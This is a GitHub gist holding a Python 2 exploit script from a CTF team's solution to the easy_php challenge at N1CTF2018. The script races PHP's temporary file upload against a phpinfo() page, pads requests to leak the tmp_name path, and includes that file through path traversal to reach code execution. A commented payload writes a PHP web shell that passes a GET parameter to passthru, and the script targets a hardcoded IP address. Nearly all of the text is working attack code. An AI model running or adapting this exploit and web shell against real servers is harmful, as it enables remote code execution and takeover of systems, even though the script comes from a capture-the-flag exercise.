Last active
March 29, 2022 19:53
-
-
Save intrd/35483ae252c66ee3d11f7acfa7379749 to your computer and use it in GitHub Desktop.
PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit | |
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team | |
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/ | |
## passwords.txt payload content | |
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?> | |
import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re | |
from subprocess import Popen, PIPE, STDOUT | |
NumOfThreads=50 | |
queue = Queue.Queue() | |
class checkHash(threading.Thread): | |
def __init__(self,queue): | |
threading.Thread.__init__(self) | |
self.queue=queue | |
def run(self): | |
i=0 | |
while True: | |
self.clear=self.queue.get() | |
passtry = self.clear | |
if passtry != "": | |
padding="A" * 5000 | |
cookies = { | |
'PHPSESSID': 'o99quh47clk8br394298tkv5o0', | |
'othercookie': padding | |
} | |
headers = { | |
'User-Agent': padding, | |
'Pragma': padding, | |
'Accept': padding, | |
'Accept-Language': padding, | |
'DNT': '1' | |
} | |
files = {'arquivo': open('passwords.txt','rb')} | |
reqs='http://47.97.221.96:23333/index.php?action=../../var/www/phpinfo/index.php&a='+padding | |
#reqs='http://172.17.0.2:80/index.php?action=../../var/www/phpinfo/index.php&a='+padding | |
response = requests.post(reqs, headers=headers, cookies=cookies, files=files, verify=False) | |
data = response.content | |
data = re.search(r"(?<=tmp_name] => ).*", data).group(0) | |
print data | |
reqs = 'http://47.97.221.96:23333/index.php?action=../..'+data | |
#reqs = 'http://172.17.0.2:80/index.php?action=../..'+data | |
print reqs | |
response = requests.get(reqs, verify=False) | |
data = response.content | |
print data | |
i+=1 | |
self.queue.task_done() | |
for i in range(NumOfThreads): | |
t=checkHash(queue) | |
t.setDaemon(True) | |
t.start() | |
for x in range(0, 9999): | |
x=str(x) | |
queue.put(x.strip()) | |
queue.join() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment